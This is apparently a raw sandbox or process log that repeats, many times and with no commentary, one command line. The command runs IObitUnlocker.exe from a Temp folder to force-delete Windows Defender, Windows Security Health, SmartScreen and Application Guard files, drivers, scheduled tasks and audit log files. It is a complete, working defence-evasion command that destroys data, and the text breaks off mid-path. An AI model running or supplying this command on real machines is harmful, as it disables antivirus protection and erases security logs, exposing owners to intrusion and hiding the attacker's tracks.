C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW